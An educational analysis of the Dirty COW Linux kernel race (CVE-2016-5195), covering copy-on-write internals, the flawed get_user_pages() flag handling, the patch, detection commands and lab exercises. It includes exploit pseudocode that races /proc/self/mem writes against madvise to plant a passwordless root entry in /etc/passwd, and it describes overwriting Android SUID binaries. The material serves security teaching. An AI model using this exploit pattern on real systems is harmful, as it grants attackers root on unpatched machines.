03 — Dirty COW Analysis (CVE-2016-5195)
Technical Overview
Dirty COW (CVE-2016-5195) is a race condition in the Linux kernel's memory management subsystem that allowed an unprivileged user to modify any file they could read (including /etc/passwd, SUID binaries, and read-only mappings such as the vDSO) without write permission. The vulnerability existed in the kernel for approximately 9 years (introduced in Linux 2.6.22, released July 2007) before being discovered and disclosed in October 2016.
The name derives from the mechanism: dirty copy-on-write. The bug allowed the write to contaminate the original file by racing the copy-on-write protection away before the write completed.
CVSS score: 7.8 HIGH (local, no interaction, high impact on confidentiality/integrity/availability).
Prerequisites
- Linux virtual memory: mmap, anonymous vs file-backed mappings
- Copy-on-write semantics in Linux VM
- /proc/self/mem (kernel mechanism for self-debugging)
- madvise() system call (memory advice hints)
- Basics of memory-mapped file I/O
Background: Copy-on-Write in Linux
Copy-on-write (CoW) is a memory optimization for fork(). When a process forks, the child inherits the parent's page tables but no pages are physically copied — both parent and child share the same physical pages, marked read-only in both page tables.
When either process writes to a shared page, the MMU detects a write to a read-only page and raises a page fault (specifically a write protection fault or COW fault). The kernel's page fault handler:
- Detects this is a COW fault (page is shared, write to CoW page)
- Allocates a new physical page
- Copies the original page's content to the new page
- Updates the faulting process's page table entry to point to the new (private) copy with write permission
- Returns, allowing the write to proceed to the private copy
The original physical page is unmodified. The parent keeps page A, and the child now has its own private copy, page B.
Before write fault:
Parent PTE: phys_page_A → read-only
Child PTE: phys_page_A → read-only (same physical page)
Physical: phys_page_A (original content)
After CoW fault (child writes):
Parent PTE: phys_page_A → read-only (unchanged)
Child PTE: phys_page_B → read-write (new private copy)
Physical A: original content (unchanged)
Physical B: copy of A, with child's write applied
For read-only file mappings: The same mechanism protects files. When a process maps a file with MAP_PRIVATE, any write to the mapping, whether a direct store through a PROT_WRITE mapping or a forced write through /proc/self/mem into a PROT_READ mapping, should go to a private copy in the process's address space and never reach the underlying file.
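The intended behaviour can be observed from userspace without any race. The following is a minimal sketch, assuming a Linux system with a writable /tmp; the function name private_write_leaves_file_intact is hypothetical and chosen for illustration. It writes through a MAP_PRIVATE mapping and then reads the file back through the file descriptor.

```c
#define _DEFAULT_SOURCE
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if a store through a MAP_PRIVATE mapping
 * left the backing file untouched, 0 if the file changed, -1 on setup error. */
int private_write_leaves_file_intact(void)
{
    char path[] = "/tmp/cow_demo_XXXXXX";
    const char original[] = "original";
    char readback[sizeof original] = {0};
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                       /* file disappears once fd is closed */

    if (write(fd, original, sizeof original) != (ssize_t)sizeof original) {
        close(fd);
        return -1;
    }

    char *map = mmap(NULL, sizeof original, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    map[0] = 'X';                       /* write fault: kernel copies the page */

    /* Read the file itself, bypassing the mapping. */
    if (pread(fd, readback, sizeof original, 0) == (ssize_t)sizeof original)
        result = (map[0] == 'X' &&
                  memcmp(readback, original, sizeof original) == 0);

    munmap(map, sizeof original);
    close(fd);
    return result;
}
```

On a correctly behaving kernel the mapping shows the modified byte while the file still holds its original content, which is exactly the guarantee Dirty COW broke.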
The Vulnerable Code Path
The vulnerability lives in the kernel's get_user_pages() code (mm/gup.c in the kernels that received the fix; the same logic sat in mm/memory.c in older kernels), specifically in the interaction between three operations:
- write() to /proc/self/mem (which can write to any address in the current process)
- madvise(MADV_DONTNEED) on a mapped region (discards the private copy, forcing the next access to re-fault)
- The kernel's get_user_pages() function, which pins pages for direct access
The normal flow for writing to a read-only mapping via /proc/self/mem:
write(proc_mem_fd, data, size, offset=mapped_ro_file_addr)
│
▼
mem_write() in fs/proc/base.c
│
▼
access_remote_vm() → get_user_pages()
│
├── Walks page table for the address
├── Finds page is read-only (CoW protection)
├── Triggers software CoW: allocates new private copy
└── Returns pointer to the NEW private copy
│
▼
copy_to_user_page() — writes data to the private copy
│
▼
RESULT: data written to private copy, ORIGINAL FILE UNCHANGED
This is the intended behavior: writing via /proc/self/mem to a read-only mmap'd address creates and writes to a private copy, never touching the original file.
The Race Condition: How Dirty COW Works
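The bug: inside get_user_pages(), breaking CoW and looking up the resulting page are two separate steps in a retry loop, and the loop forgets that it needs a writable page once CoW has been broken. An attacker can race madvise(MADV_DONTNEED) against that loop to discard the private copy between the two steps. The retry then faults the page in as a plain read, get_user_pages() returns the file's page-cache page, and copy_to_user_page() writes to the original file.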
Race window timing diagram:
Thread 1 (Writer): write() to /proc/self/mem
Thread 2 (Madvise): madvise(MADV_DONTNEED) in a tight loop
Thread 1                                          Thread 2
  │                                                 │
  write(proc_fd, data, ...)                         │
  ▼                                                 │
  get_user_pages(FOLL_WRITE | FOLL_FORCE)           │
  ├── follow_page(): PTE is read-only, lookup fails │
  ├── faultin_page(): CoW fault, PRIVATE copy       │
  │   allocated, FOLL_WRITE cleared        ←━━━━━━━━┥ RACE WINDOW OPENS
  │                                                 ▼
  │                                          madvise(addr, MADV_DONTNEED)
  │                                          DISCARDS PRIVATE COPY
  │                                          (PTE cleared; next fault maps the file page)
  ├── follow_page() retry: no page mapped
  ├── faultin_page(): READ fault (FOLL_WRITE is gone),
  │   maps the file's page-cache page
  ├── follow_page() retry: returns the page-cache page
  │                                          RACE WINDOW CLOSES
  ▼
  copy_to_user_page() writes to the returned page
  The private copy was discarded!
  The returned page is the original file page!
  → WRITE GOES TO ORIGINAL FILE
Result: read-only file has been modified
Key insight: MADV_DONTNEED discards the private CoW copy, so the next fault maps the underlying file page again. If this happens after the CoW fault inside get_user_pages() but before the loop looks the page up again, the retry no longer asks for write access, so it is handed the original file's page-cache page, and the write proceeds to that page.
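The effect of MADV_DONTNEED on a private copy can be shown in isolation, with no race and no /proc/self/mem involved. This is a sketch under the assumption of a Linux system with a writable /tmp; dontneed_reverts_to_file is a hypothetical name. It dirties a MAP_PRIVATE page, discards it, and checks that the next read sees the file's content again.

```c
#define _DEFAULT_SOURCE
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if MADV_DONTNEED dropped the private copy
 * so that the mapping shows the file's content again, 0 if it did not,
 * -1 on setup error. */
int dontneed_reverts_to_file(void)
{
    char path[] = "/tmp/dontneed_demo_XXXXXX";
    const char original[] = "original";
    long page = sysconf(_SC_PAGESIZE);
    int result = -1;

    if (page <= 0)
        return -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);

    if (write(fd, original, sizeof original) != (ssize_t)sizeof original) {
        close(fd);
        return -1;
    }

    char *map = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    map[0] = 'X';                           /* CoW: page is now a private copy */
    int saw_private_copy = (map[0] == 'X');

    /* Discard the private copy; the next access re-faults from the file. */
    if (madvise(map, (size_t)page, MADV_DONTNEED) == 0)
        result = saw_private_copy && map[0] == 'o';

    munmap(map, (size_t)page);
    close(fd);
    return result;
}
```

The modification made through the mapping is simply lost, which is harmless on its own. The vulnerability arises only when this discard lands in the middle of the kernel's own page lookup.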
The race window is narrow but not impossibly so. On any multi-core or Hyper-Threading system, Thread 1 and Thread 2 run genuinely concurrently, and because both loop continuously the window is eventually hit.
Technical Deep Dive: get_user_pages() Flaw
The core issue was in faultin_page() (called by get_user_pages()):
/* VULNERABLE CODE (simplified, pre-patch) */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    /* Trigger CoW fault: allocates private copy */
    ret = handle_mm_fault(mm, vma, address, fault_flags);
    /* (error handling omitted) */

    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) {
        /* CoW happened on a mapping the process cannot write itself. */
        /* PROBLEM: before the caller looks the page up again,
           MADV_DONTNEED can discard the private copy */
        *flags &= ~FOLL_WRITE;  /* WRONG: clears write requirement
                                   allowing retry without CoW */
    }
    return 0;
}
The bug is *flags &= ~FOLL_WRITE after a successful CoW: this flag controls whether subsequent retries of get_user_pages() will require write access. By clearing it, if the loop retries after MADV_DONTNEED discards the private copy, the retry gets the original read-only page WITHOUT performing CoW again — and then the write proceeds directly to the original file page.
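The retry logic can be traced with a deterministic userspace toy model. This is only a sketch: every name below (toy_pte, toy_follow_page, toy_gup_vulnerable and so on) is hypothetical, the "page table" is a single struct, and the concurrent madvise() is simulated by clearing the entry at a fixed point in the loop rather than by a real second thread.

```c
#include <stdbool.h>

enum page_kind { PAGE_NONE, PAGE_FILE, PAGE_PRIVATE_COPY };

#define TOY_FOLL_WRITE 0x1u

struct toy_pte {
    enum page_kind page;   /* what the entry currently maps */
    bool writable;         /* stays false: the VMA is read-only */
};

/* Model of the lookup step: fails if nothing is mapped, or if a writable
 * page is required and the entry is not writable. */
static enum page_kind toy_follow_page(const struct toy_pte *pte, unsigned flags)
{
    if (pte->page == PAGE_NONE)
        return PAGE_NONE;
    if ((flags & TOY_FOLL_WRITE) && !pte->writable)
        return PAGE_NONE;
    return pte->page;
}

/* Model of the pre-patch fault step. */
static void toy_faultin_page_vulnerable(struct toy_pte *pte, unsigned *flags)
{
    if (*flags & TOY_FOLL_WRITE) {
        pte->page = PAGE_PRIVATE_COPY;   /* write fault breaks CoW */
        *flags &= ~TOY_FOLL_WRITE;       /* the bug: requirement forgotten */
    } else {
        pte->page = PAGE_FILE;           /* read fault maps the file page */
    }
    pte->writable = false;
}

/* Returns the page the forced write would land on. If discard_after_cow is
 * true, a simulated MADV_DONTNEED clears the entry right after the first
 * fault, i.e. inside the race window. */
enum page_kind toy_gup_vulnerable(bool discard_after_cow)
{
    struct toy_pte pte = { PAGE_FILE, false };
    unsigned flags = TOY_FOLL_WRITE;
    bool discarded = false;

    for (int attempt = 0; attempt < 8; attempt++) {
        enum page_kind page = toy_follow_page(&pte, flags);
        if (page != PAGE_NONE)
            return page;
        toy_faultin_page_vulnerable(&pte, &flags);
        if (discard_after_cow && !discarded) {
            pte.page = PAGE_NONE;        /* simulated MADV_DONTNEED */
            discarded = true;
        }
    }
    return PAGE_NONE;
}
```

Calling toy_gup_vulnerable(false) yields PAGE_PRIVATE_COPY, the intended outcome, while toy_gup_vulnerable(true) yields PAGE_FILE: the second fault is a read fault because the write requirement was dropped.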
Exploitation: Modifying /etc/passwd
The most common exploitation method:
/* Classic Dirty COW exploit pseudocode */
int f = open("/etc/passwd", O_RDONLY);
struct stat st;
fstat(f, &st);

/* Map /etc/passwd read-only */
char *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);

/* Thread 1: write "root" entry with no password */
void *write_thread(void *arg) {
    int proc_fd = open("/proc/self/mem", O_RDWR);
    while (!stop) {
        /* Write backdoor root entry over first line */
        lseek(proc_fd, (off_t)map, SEEK_SET);
        write(proc_fd, backdoor_entry, strlen(backdoor_entry));
    }
}

/* Thread 2: MADV_DONTNEED in a loop */
void *madvise_thread(void *arg) {
    while (!stop) {
        madvise(map, st.st_size, MADV_DONTNEED);
    }
}

/* Start both threads, run for ~200ms */
/* Check: did /etc/passwd get modified? */
/* If not, try again */
After successful exploitation, /etc/passwd contains a new root entry (or modified root entry with no password hash). The attacker then runs su with no password to gain root.
Android exploitation: The same technique was used to overwrite a SUID binary (e.g., /system/bin/run-as or /system/xbin/su) with a backdoored version. On Android, this was particularly effective because:
- Android apps run as isolated UIDs but can access /proc/self/mem
- /system is mounted read-only, but its binaries are readable by apps, which is all Dirty COW needs
- A successful overwrite of run-as gave a root shell (the change lives in the page cache, so on a read-only /system it lasts until the page is evicted or the device reboots)
Exploitation Timeline
2007-07-08: Linux 2.6.22 released — bug introduced
| (approximately — exact introduction commit is
| controversial; the bug's root is older)
|
| 9 YEARS of silent presence in every Linux system
| deployed globally
|
2016-10-18: Linus Torvalds commits the fix to mainline
("This is an ancient bug...")
|
2016-10-19: CVE-2016-5195, reported by Phil Oester, is publicly disclosed
Discovery: found in the wild, in an exploit extracted
from captured HTTP traffic to a compromised server
|
2016-10-20: Linux 4.8.3, 4.7.9, 4.4.26 released with fix
|
2016-11: Android security bulletin includes patches for
all supported Android versions
|
2016-2017: Dirty COW used in:
- Android device rooting tools (mass deployment)
- Targeted attacks against Linux web servers
- Container escapes (early, before seccomp blocking)
Phil Oester, the discoverer, found it not by code review but by extracting an exploit from captured HTTP traffic after a server he managed was compromised; the exploit used Dirty COW to gain root. The bug had been in production for 9 years before real-world exploitation was observed.
Linus Torvalds' commit message: "This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ('Fix get_user_pages() race for write access') but that was then undone due to problems on s390 by commit f33ea7f404e5 ('fix get_user_pages bug')."
The original fix attempt was from 2005, making the underlying issue acknowledged for 11 years before the correct fix was applied.
The Patch
The fix removed the FOLL_WRITE-clearing trick and replaced it with a separate FOLL_COW flag that records that CoW has already been broken, while the write requirement stays in force:
/* PATCHED approach (simplified) */
static int faultin_page(...)
{
    /* declarations as in the vulnerable version */

    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    ret = handle_mm_fault(mm, vma, address, fault_flags);

    /* KEY CHANGE: do NOT clear FOLL_WRITE after CoW */
    /* The retry loop will re-check page writability each time */
    /* If MADV_DONTNEED discards the copy, retry will redo CoW */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags |= FOLL_COW;  /* mark that we already did CoW */
    return 0;
}
The critical change: stop clearing FOLL_WRITE after CoW. If the private copy is discarded between iterations of get_user_pages()'s retry loop, the next iteration will require write access again, trigger a new CoW, and get a fresh private copy. The window for the race is eliminated because every retry re-performs CoW before writing.
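The patched behaviour can be traced with a small deterministic toy model. As a sketch only: all names are hypothetical, the dirty bit and the FORCE/COW acceptance rule are modelled on the can_follow_write_pte() check that accompanied the fix, and the concurrent madvise() is simulated at a fixed point instead of by a real thread.

```c
#include <stdbool.h>

enum page_kind { PAGE_NONE, PAGE_FILE, PAGE_PRIVATE_COPY };

#define TOY_FOLL_WRITE 0x1u
#define TOY_FOLL_FORCE 0x2u
#define TOY_FOLL_COW   0x4u

struct toy_pte {
    enum page_kind page;
    bool writable;         /* stays false: the VMA is read-only */
    bool dirty;            /* set when CoW produced a private copy */
};

/* A non-writable entry is acceptable for a forced write only if CoW was
 * already broken (COW flag) and the entry still holds that dirty copy. */
static bool toy_can_follow_write(const struct toy_pte *pte, unsigned flags)
{
    return pte->writable ||
           ((flags & TOY_FOLL_FORCE) && (flags & TOY_FOLL_COW) && pte->dirty);
}

static enum page_kind toy_follow_page(const struct toy_pte *pte, unsigned flags)
{
    if (pte->page == PAGE_NONE)
        return PAGE_NONE;
    if ((flags & TOY_FOLL_WRITE) && !toy_can_follow_write(pte, flags))
        return PAGE_NONE;
    return pte->page;
}

/* Model of the patched fault step: FOLL_WRITE is never cleared. */
static void toy_faultin_page_patched(struct toy_pte *pte, unsigned *flags)
{
    if (*flags & TOY_FOLL_WRITE) {
        pte->page = PAGE_PRIVATE_COPY;
        pte->dirty = true;
        *flags |= TOY_FOLL_COW;          /* remember that CoW was done */
    } else {
        pte->page = PAGE_FILE;
        pte->dirty = false;
    }
    pte->writable = false;
}

/* Returns the page the forced write would land on, optionally with a
 * simulated MADV_DONTNEED right after the first fault. */
enum page_kind toy_gup_patched(bool discard_after_cow)
{
    struct toy_pte pte = { PAGE_FILE, false, false };
    unsigned flags = TOY_FOLL_WRITE | TOY_FOLL_FORCE;
    bool discarded = false;

    for (int attempt = 0; attempt < 8; attempt++) {
        enum page_kind page = toy_follow_page(&pte, flags);
        if (page != PAGE_NONE)
            return page;
        toy_faultin_page_patched(&pte, &flags);
        if (discard_after_cow && !discarded) {
            pte.page = PAGE_NONE;        /* simulated MADV_DONTNEED */
            pte.dirty = false;
            discarded = true;
        }
    }
    return PAGE_NONE;
}
```

With or without the simulated discard, toy_gup_patched() returns PAGE_PRIVATE_COPY: after the discard, the next fault is again a write fault, so a fresh private copy is created before any page is handed back.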
Impact Assessment
Affected systems: Every Linux system running kernel 2.6.22 through 4.8.2. This includes:
- All major Linux distributions (Ubuntu, Debian, RHEL, CentOS, Fedora, openSUSE)
- Android 1.0 through 7.1 (approximately)
- Embedded Linux systems, routers, IoT devices (many never patched)
- Container hosts, since containers run on the host kernel
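Exploitability: Very high. The window itself is narrow, but both threads loop continuously, so exploits that run the two loops for a fixed interval (around 200 ms in the pseudocode above) and retry on failure succeed almost every time on multi-core or Hyper-Threading systems. Even where the threads are rarely scheduled concurrently, the race is winnable with patient iteration.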
Actual exploitation in the wild: Documented in:
- Android rooting tools ("DirtyCOW root exploit for Android 5/6/7"), distributed via app stores and rooting forums
- Linux privilege escalation in CTF competitions (reliable, fast)
- Targeted attacks against cloud Linux instances (documented by Red Hat security team)
Lessons: Why Race Condition Bugs Are Long-Lived
Dirty COW illustrates why race conditions are among the hardest bugs to detect and fix:
- No static analyzer of the time flagged it: The flaw requires reasoning about two concurrent code paths, their relative timing, and the state change from MADV_DONTNEED. No compiler warning and no -fsanitize flag catches it.
- Normal execution appears correct: Running the vulnerable code path once, with no concurrent madvise, works perfectly. Unit tests pass. System tests pass. Only under specific race conditions does the bug manifest.
- Distance between components: The bug involves mm/memory.c (CoW handling), mm/madvise.c (MADV_DONTNEED), and fs/proc/base.c (/proc/self/mem write). The interaction between three separate pieces of code is not apparent in code review of any single file.
- Previous fix was incomplete: Linus's 2005 fix attempted to solve the same problem but was undone due to problems on s390. The correct fix required understanding why the original fix broke s390.
- Race detection tooling was not available: ThreadSanitizer targets userspace, and its kernel counterpart KCSAN (Kernel Concurrency Sanitizer) was merged only in Linux 5.8 (2020), four years after Dirty COW was found.
Variant Analysis: Dirty Pipe (CVE-2022-0847)
For comparison, Dirty Pipe is a 2022 vulnerability by Max Kellermann with similar impact (write to read-only files) but different mechanism:
- Class: Logic error (uninitialized flags field) in pipe splice code, not a race condition
- Mechanism: The flags field of a pipe buffer was not initialized when the buffer was filled by splicing from a file, so a stale PIPE_BUF_FLAG_CAN_MERGE could survive from the slot's previous use. Subsequent writes to the pipe could then "merge" into the spliced page, writing to the original file's page cache.
- No race required: Dirty Pipe is deterministic, fully reliable, single-threaded
- Impact: Same as Dirty COW: write to any file readable by the process
- Kernel versions: 5.8 (when the flaw became exploitable) through 5.16.10
Both bugs allow writing to arbitrary read-only files but Dirty Pipe is simpler to exploit reliably.
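The stale-flag mechanism can be illustrated with a toy model of a single pipe ring slot. This is a sketch, not kernel code: the struct, the constant, and the function names are all hypothetical, and the init_flags parameter stands in for the presence or absence of the missing initialization.

```c
#include <stdbool.h>

#define TOY_CAN_MERGE 0x1u

enum toy_backing { BACKING_ANON, BACKING_FILE_PAGE };

struct toy_pipe_buf {
    enum toy_backing backing;   /* what the slot's page belongs to */
    unsigned flags;
};

/* An ordinary write() into the pipe: anonymous page, later writes may be
 * appended to it, so the merge flag is set. */
static void toy_pipe_write_fresh(struct toy_pipe_buf *slot)
{
    slot->backing = BACKING_ANON;
    slot->flags = TOY_CAN_MERGE;
}

/* splice() from a file reuses the slot and points it at a page-cache page.
 * With init_flags == false the old flags are left in place (the bug). */
static void toy_splice_from_file(struct toy_pipe_buf *slot, bool init_flags)
{
    slot->backing = BACKING_FILE_PAGE;
    if (init_flags)
        slot->flags = 0;
}

/* Would the next write() into the pipe append to this slot's page? */
static bool toy_write_would_merge(const struct toy_pipe_buf *slot)
{
    return (slot->flags & TOY_CAN_MERGE) != 0;
}

/* Returns true if a write following the splice would land on the file's
 * page-cache page. */
bool toy_write_hits_file_page(bool init_flags)
{
    struct toy_pipe_buf slot;

    toy_pipe_write_fresh(&slot);               /* slot used once, then drained */
    toy_splice_from_file(&slot, init_flags);   /* same slot reused by splice */
    return slot.backing == BACKING_FILE_PAGE && toy_write_would_merge(&slot);
}
```

toy_write_hits_file_page(false) returns true and toy_write_hits_file_page(true) returns false. No timing is involved, which is why Dirty Pipe needs neither a second thread nor retries.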
Debugging Notes
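# Check if kernel is vulnerable
uname -r
# Upstream fixes: 4.8.3, 4.7.9, 4.4.26 (earlier releases of these series are vulnerable;
# distribution kernels may carry a backported fix under an older version number)

# Check KCSAN (Kernel Concurrency Sanitizer) status
grep CONFIG_KCSAN /boot/config-$(uname -r)

# Monitor for Dirty COW exploitation attempts
# Pattern: rapid madvise + /proc/self/mem writes from same process
# Caveat: Dirty COW changes the page cache without going through the normal
# write path, so the watches below may stay silent and mtime may not change
inotifywait -m /etc/passwd &
# Then watch for writes

# Audit approach
auditctl -w /etc/passwd -p w -k passwd_write

# Post-exploitation detection: /etc/passwd modification time,
# plus a content hash to compare against a known-good copy
stat /etc/passwd
sha256sum /etc/passwd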
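The version comparison against the three fixed releases listed above can be automated. The sketch below is a heuristic only: the function names are hypothetical, it knows just the three stable series named in this document plus mainline 4.9 and later, and it cannot see fixes that a distribution backported without changing the upstream version number.

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Parse the leading "major.minor[.patch]" of a release string such as
 * "4.4.0-21-generic". Returns 0 on success, -1 if it does not parse. */
int parse_release(const char *release, int v[3])
{
    v[0] = v[1] = v[2] = 0;
    return sscanf(release, "%d.%d.%d", &v[0], &v[1], &v[2]) >= 2 ? 0 : -1;
}

/* Returns 1 if the release predates the upstream fix in its series,
 * 0 if it is at or after the fix, -1 if this table cannot tell
 * (unparseable string, or a series not listed in this document). */
int predates_upstream_fix(const char *release)
{
    int v[3];

    if (parse_release(release, v) != 0)
        return -1;
    if (v[0] > 4 || (v[0] == 4 && v[1] >= 9))
        return 0;                       /* released after the fix */
    if (v[0] == 4 && v[1] == 8)
        return v[2] < 3;                /* fixed in 4.8.3 */
    if (v[0] == 4 && v[1] == 7)
        return v[2] < 9;                /* fixed in 4.7.9 */
    if (v[0] == 4 && v[1] == 4)
        return v[2] < 26;               /* fixed in 4.4.26 */
    return -1;                          /* consult the vendor advisory */
}

/* Same check for the running kernel, using uname(2). */
int running_kernel_predates_fix(void)
{
    struct utsname u;

    if (uname(&u) != 0)
        return -1;
    return predates_upstream_fix(u.release);
}
```

A result of 1 for a distribution kernel such as "4.4.0-21-generic" means only that the upstream version number predates the fix; the distribution's own security advisory is the authoritative source.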
Security Implications
Dirty COW demonstrates the risk of:
- Complex multi-threaded kernel code paths: The interaction of multiple syscalls in concurrent scenarios creates emergent vulnerabilities
- Treating read-only memory as immutable: If a kernel bug allows bypassing the write protection, "read-only" files can be silently modified
- Privileged processes (SUID binaries): Modifying a SUID binary is equivalent to gaining root; any readable SUID binary is a target
- Containers: Despite container isolation, all containers share the host kernel, so a Dirty COW exploit inside a container can escape it because the pages it modifies belong to the host kernel's page cache
Performance Implications
The fix changes a flag check inside the existing retry loop in get_user_pages(); it adds no new loop, and this path is not on the hot path for normal memory access. The performance impact of the patch should be negligible.
KCSAN, a later tool for finding kernel data races, has substantial runtime overhead and is only enabled in debug kernels, not production.
Failure Modes
Exploit race not won: The two threads iterate for the window duration without winning. On heavily loaded systems, the scheduler may not interleave them appropriately. Raising priority with a negative nice value or real-time scheduling requires privileges an unprivileged attacker does not have, so in practice the exploit runs longer or is retried.
Kernel oops: If the race is won in a way that corrupts kernel data structures rather than cleanly writing to the file page, the kernel may oops. Rare but observed in buggy exploit implementations.
Partial write: Only part of the modification was written before the race window closed. /etc/passwd may be partially corrupted. Solution: check file integrity before proceeding.
Modern Usage
Dirty COW is patched on any modern Linux kernel. Its continued relevance is:
- Unpatched IoT/embedded devices: Millions of embedded Linux systems running 2.6.x-4.x kernels will never be updated. Dirty COW is reliably exploitable on any such device that can be accessed.
- Educational value: Dirty COW is the canonical race condition kernel exploit used in security education, CTF challenges, and exploit development training because it is approachable, well-documented, and historically important.
- Variant hunting: Understanding Dirty COW's mechanism motivates looking for similar races in other VM interactions. CVE-2017-1000405 ("Huge Dirty COW", the same flaw in the transparent huge page path) and CVE-2020-29374 (a later get_user_pages() CoW issue) follow directly from this line of analysis.
Future Directions
KCSAN deployment in CI/CD: Google's kernel fuzzing infrastructure (syzkaller + KCSAN) now runs continuously against the Linux kernel mainline, catching many new data races before they reach stable kernels. KCSAN instruments memory accesses and sets sampled watchpoints on them; if another CPU accesses the same memory location concurrently without proper synchronization, KCSAN reports it.
Memory safety for CoW paths: A Rust rewrite of the CoW page fault handler could tie the lifetime of the CoW page to the write that uses it, making this kind of mistake harder to write. Dirty COW was a logic error in flag handling rather than a classic memory-safety violation, however, so safe Rust alone would not have guaranteed its absence.
Exercises
- Set up a Linux VM running kernel 4.4.x (Ubuntu 16.04 is a good choice). Run the Dirty COW exploit against /etc/passwd. Verify exploitation. Patch the kernel and confirm the exploit fails.
- Read Linus's 2005 commit (4ceb5db9757a) and the commit that undid it (f33ea7f404e5). Understand why the 2005 fix broke s390. Write a one-page explanation.
- Implement a minimal Dirty COW PoC that writes a single byte to a read-only file. Measure the average time-to-win the race across 100 runs on your test system.
- Compare CVE-2016-5195 (Dirty COW) and CVE-2022-0847 (Dirty Pipe): both write to read-only files. Write a comparison table of mechanism, reliability, kernel version range, and mitigation.
- Use KCSAN on a test kernel: enable CONFIG_KCSAN=y, write a kernel module that deliberately has a data race, and capture the KCSAN report. Understand what a KCSAN report looks like.
References
- CVE-2016-5195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
- Dirty COW website (Phil Oester's disclosure, historical): https://dirtycow.ninja/
- Linus Torvalds' fix commit: 19be0eaffa3a ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()")
- CVE-2022-0847 (Dirty Pipe) analysis: https://dirtypipe.cm4all.com/
- KCSAN paper: "KCSAN: Finding races in the Linux kernel", Marco Elver, Google, 2020
- Android DirtyCow analysis: Project Zero blog
- mm/memory.c: Linux kernel CoW implementation
- Linux kernel git: git log --all --oneline | grep -i "cow\|get_user_pages\|foll_write"